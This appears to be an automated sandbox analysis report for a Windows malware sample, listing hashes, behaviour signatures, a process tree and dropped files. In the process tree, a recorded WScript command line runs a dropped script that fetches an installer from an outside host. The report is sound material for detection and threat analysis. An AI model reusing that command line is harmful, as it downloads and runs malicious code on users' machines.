Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    118s
  • max time network
    128s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    14/06/2024, 08:13

General

  • Target

    a8adce2bcf005d7f902ccb8badf90e4e_JaffaCakes118.exe

  • Size

    184KB

  • MD5

    a8adce2bcf005d7f902ccb8badf90e4e

  • SHA1

    638623efc1cb9a80b8032b7f5e392e519a8edf13

  • SHA256

    0469cce2c49381b44b8584778af67ca112ade852e38e64114f33fcf7f244c419

  • SHA512

    4ac4d8f2c4c81e5607e9612db4480f1d6943318a619ca7621f90af61018ce8edf11df8d757b6ee6ca66b317c4fda5702f40daaae131f79386e8323b826c4ca50

  • SSDEEP

    3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3z:/7BSH8zUB+nGESaaRvoB7FJNndn6

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 14 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a8adce2bcf005d7f902ccb8badf90e4e_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\a8adce2bcf005d7f902ccb8badf90e4e_JaffaCakes118.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2548
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf7CE.js" http://www.djapp.info/?domain=ZEFYsRDJJt.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf7CE.exe
      2⤵
      • Blocklisted process makes network request
      • Modifies system certificate store
      PID:3056
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf7CE.js" http://www.djapp.info/?domain=ZEFYsRDJJt.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf7CE.exe
      2⤵
      • Blocklisted process makes network request
      • Modifies system certificate store
      PID:2180
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf7CE.js" http://www.djapp.info/?domain=ZEFYsRDJJt.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf7CE.exe
      2⤵
      • Blocklisted process makes network request
      PID:2556
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf7CE.js" http://www.djapp.info/?domain=ZEFYsRDJJt.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf7CE.exe
      2⤵
      • Blocklisted process makes network request
      PID:2064
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf7CE.js" http://www.djapp.info/?domain=ZEFYsRDJJt.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf7CE.exe
      2⤵
      • Blocklisted process makes network request
      PID:2892
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2548 -s 608
      2⤵
      • Program crash
      PID:2152

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

    Filesize

    1KB

    MD5

    5eaa9902dd28d9f691e7047b2aef4f4c

    SHA1

    8041448f3ae60fc2a27d4e679a98e381cc1bc54d

    SHA256

    ae964a6edefed2e02ef6481b9d263bf474ab11b8207c0250a69c0aefea4617d1

    SHA512

    24200cca9f70e0c6535d1bb1a0214174ee3cfd1e841ad4269989fb848380d42a8b0f8d50f423beb975b594e4a246be4e59bc5429abfad3b535c92ce1f37fb223

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

    Filesize

    724B

    MD5

    8202a1cd02e7d69597995cabbe881a12

    SHA1

    8858d9d934b7aa9330ee73de6c476acf19929ff6

    SHA256

    58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

    SHA512

    97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

    Filesize

    1KB

    MD5

    a266bb7dcc38a562631361bbf61dd11b

    SHA1

    3b1efd3a66ea28b16697394703a72ca340a05bd5

    SHA256

    df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

    SHA512

    0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

    Filesize

    410B

    MD5

    7795395a3cfeb7b461011b15ac0d3339

    SHA1

    6606418fcb8a824dbc9f705e2e4e355cc84cfb86

    SHA256

    9569f17b27ec9b6d5c9fda32e4f2a11fdd3380440295995285cbbb10e0f10fdd

    SHA512

    9f321b575ac71963e0b7cd578eab234b1d80acb3ceb7aaf25d0882d8d922354587fb7540af1fb9f14e129fc9af27fbcc2a322b0a650d29724c154603d225dfdd

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    858ecf39c9b127b3f86bc6edde77defb

    SHA1

    0d981965544b4ba0f7e2a8674d3c4a5707d046da

    SHA256

    a5ae8b684dfa5354d6b7c121826eea49347de7713f1f547bba77244a0cbfcbb2

    SHA512

    00a0b26f8f2f9825efb58249d16922c964a2370bb76852aef33d19c663c795d092d4f720d48d0b172f4d772d943f792c95130ee72b04b6586b48d7c905eda849

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

    Filesize

    392B

    MD5

    a424bec07641925d77773f945f08f3f2

    SHA1

    44138f42a79edd92576001871b6ac07ae5b368d3

    SHA256

    fb4250bc13f43f0284251e72f9bb2f333ea85b024ff3bd76caaba7a2fe505153

    SHA512

    dd778da0ee375ded083f9dbf7074dcb90f7a19d509fd8da2fd2826d2cdfdfe4b8a2f94f4ef6c4786b870e58fc6e8fe9a5fd14333a7370451d47db6041a5a0125

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

    Filesize

    242B

    MD5

    e2cdcb96427879f31bf1dc583b46502c

    SHA1

    b1b7c0950ff5f947920a61db195fa51e5089aacf

    SHA256

    5e18714451fe4ea0ead7f3adda14a0332bff410ac0a7c7bdd9d3324c78bac669

    SHA512

    23059b3c90b6ede6da5ea94ce2300779d97addecec85fddd3790dd21fee89efeb21cd539716abae8d4aa12aea8b9c379255d330dc586f01b82acbcfdd0e98eb8

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2NBYZSXU\domain_profile[1].htm

    Filesize

    6KB

    MD5

    b255a58cca62f5f5681a47dbd63c80bb

    SHA1

    926c1f8347e3177f449b3131270c13c1bbd476c8

    SHA256

    024a93e41913f89a00b4270930ce528c9551acc27af54a11d5202d069efb50b6

    SHA512

    40f418c7a2bf623732ea6f3e29ea87a9639902a567aef5498769377441acc4a2c225813c37ec7160c63b646db3bc8f57d25f5128d5fc7b39362b7f2d6026a345

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2NBYZSXU\domain_profile[1].htm

    Filesize

    40KB

    MD5

    21b51dbf51004e9840fc407498f6b669

    SHA1

    cad66ec8bac72bafdc4ad06f96ea735acf7cfd25

    SHA256

    5ccafd706dfb3ebfe935b69bf6f00a39356e83311df28a1e7e08d883df2859b3

    SHA512

    0ee91d7bd3995cd6c43634822b05e40b6eb5060a54f251f48a8c8e51ccdadfd8e95c8827906b532db1cef94dc1facd04974cc4b796f03efb2429eea831f5d166

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DUYXDY32\domain_profile[1].htm

    Filesize

    6KB

    MD5

    ac4e915a1c456947c3b29ab7905bf761

    SHA1

    dfb37ed8b27839926fddd5ce89c75a88a3a69e16

    SHA256

    01b12c72d6f2e8ab7015b08256a854c3af191903073e6d77c802f16a960e4a28

    SHA512

    446913af1f051ae983c3240669a02df6e10b98caae554bf169bcfb9bf930f4251dd928ba2b94c8cf2fcc7b4a50fca333bd05d082e64c38f99482b08569b7b193

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DUYXDY32\domain_profile[1].htm

    Filesize

    6KB

    MD5

    14804b61afec895b71c7c192f951d448

    SHA1

    22836fdffc17056dfc03da12cdd757213cf9c9e7

    SHA256

    1d2be51568272d7e1724029a2b922cd72322fedf80422bae9e47cab3d47b9a7f

    SHA512

    24227381f3b0817ec5ef90801dda47f2e131c8f5fbaf86b4a2139bc4c34ac098f5a4b786a6371f4b75511cb33c24fc1c6c15a57e083ae5673bbdc40f7694c79d

  • C:\Users\Admin\AppData\Local\Temp\Tar4FC6.tmp

    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

  • C:\Users\Admin\AppData\Local\Temp\fuf7CE.js

    Filesize

    3KB

    MD5

    3813cab188d1de6f92f8b82c2059991b

    SHA1

    4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

    SHA256

    a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

    SHA512

    83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\TUBZ363E.txt

    Filesize

    177B

    MD5

    f106c6f7ae4515ce09f28da075fa3811

    SHA1

    e4e083b5094343222d14eba441b05709aba021be

    SHA256

    665389df8681a194139f669563facf73d05c3d0355936f69a991b539cdcc5b48

    SHA512

    d90b707e68ec42c8e16bda1750b52779f07f784d041a07abbad527bcd003788bb1fe946d0117959e8849a35f1d3988f481e87b96996b60231502d455dd914c79